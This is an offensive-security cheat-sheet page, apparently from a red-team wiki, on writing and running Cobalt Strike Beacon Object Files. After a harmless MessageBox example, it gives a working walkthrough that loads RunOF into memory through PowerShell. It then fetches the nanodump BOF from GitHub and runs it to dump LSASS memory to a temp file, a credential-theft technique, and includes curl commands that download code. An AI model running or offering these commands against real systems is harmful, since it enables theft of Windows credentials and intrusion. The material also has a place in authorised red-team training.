BOF / COFF

Beacon Object Files / Common Object File Format

Argument types for bof_pack:

Type

Description

Unpack With (C)

binary data

BeaconDataExtract

4-byte integer

BeaconDataInt

2-byte short integer

BeaconDataShort

zero-terminated+encoded string

BeaconDataExtract

zero-terminated wide-char string

(wchar_t *)BeaconDataExtract

A basic BOF example:

msgbox.c

// curl -sS https://download.cobaltstrike.com/downloads/beacon.h -o beacon.h
// x86_64-w64-mingw32-gcc -c msgbox.c -o msgbox.o

#include <windows.h>
#include "beacon.h"

void go(char* args, int alen)
{
    DECLSPEC_IMPORT INT WINAPI USER32$MessageBoxA(HWND, LPCSTR, LPCSTR, UINT);

    datap parser;
    BeaconDataParse(&parser, args, alen);

    char* message;
    message = BeaconDataExtract(&parser, NULL);

    USER32$MessageBoxA(NULL, message, "Hello from BOF!", 0);
}

msgbox.cna

alias msgbox {
    local('$handle $bof $args');

    # Read the bof file
    $handle = openf(script_resource("msgbox.o"));
    $bof = readb($handle, -1);
    closef($handle);

    # Pack args
    $args = bof_pack($1, "z", $2);
    
    # Print task to console
    btask($1, "Running MessageBoxA BOF");
    
    # Execute BOF
    beacon_inline_execute($1, $bof, "go", $args);
}

beacon_command_register("msgbox", "Pops a message box", "Calls the MessageBoxA Win32 API");

Run BOFs outside of C2

RunOF

An example of running the nanodump.x64.o BOF via RunOF fork from memory:

Compile RunOF.exe assembly and convert it to a PowerShell invoker (see .NET Reflective Assembly)
Search for argument types that the target BOF uses (usually located in accompanying Aggressor scripts):

curl -sSL 'https://github.com/helpsystems/nanodump/raw/main/'`curl -sSL 'https://api.github.com/repos/helpsystems/nanodump/git/trees/main?recursive=1' | jq -r '.tree[] | select(.path | endswith(".cna")) | .path'` | grep bof_pack
    $args = bof_pack($1, "iziiiiiiiziiz", $pid, $dump_path, $write_file, $use_valid_sig, $fork, $snapshot, $dup, $get_pid, $use_malseclogon, $binary_path, $use_malseclogon_race, $use_werfault, $werfault_lsass);
    $args = bof_pack($1, "ziiiiizb", $dump_path, $use_valid_sig, $fork, $snapshot, $dup, $use_malseclogon, $binary_path, $dll);
    $args = bof_pack($1, "z", $ssp_path);
    $args = bof_pack($1, "z", $2);

Load the invoker into memory, fetch the BOF (-u option) and run it providing necessary arguments with their types like this:

PS > Invoke-RunOF -u https://github.com/helpsystems/nanodump/raw/main/dist/nanodump.x64.o '-i:0' '-z:C:\Windows\Temp\lsass.bin' '-i:1' '-i:1' '-i:0' '-i:0' '-i:0' '-i:0' '-i:0' '-z:' '-i:0' '-z:'

Last updated 10 months ago